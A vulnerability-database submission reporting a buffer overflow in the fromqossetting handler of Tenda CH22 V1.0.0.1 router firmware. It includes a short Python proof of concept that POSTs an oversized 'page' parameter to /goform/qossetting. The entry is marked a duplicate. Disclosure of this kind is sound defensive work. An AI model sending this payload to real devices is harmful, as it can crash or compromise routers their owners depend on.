| Title | Tenda CH22 V1.0.0.1 Buffer Overflow |
|---|
| Description | Overview
Firmware download website: https://www.tenda.com.cn/download/2230
Affected version
CH22 V1.0.0.1
Vulnerability details
The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the fromqossetting function. The v8 variable receives the page parameter from a POST request and is later passed to the sprintf function. However, since the user can control the input of page , the statement sprintf(s, "qos_list.asp?page=%s", v8); can cause a buffer overflow.
PoC
import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/qossetting'
payload = b'a' * 1000
data = {
'page':payload
}
requests.post(url, data=data) |
|---|
| Source | ⚠️ https://candle-throne-f75.notion.site/Tenda-CH22-fromqossetting-377df0aa118580ad8e91eff246d1543d |
|---|
| User | ysnysn0121 (UID 86198) |
|---|
| Submission | 06/06/2026 10:30 (29 days ago) |
|---|
| Moderation | 07/04/2026 18:23 (28 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 277436 [Tenda CH22 1.0.0.6(468) /goform/fromqossetting qos stack-based overflow] |
|---|
| Points | 0 |
|---|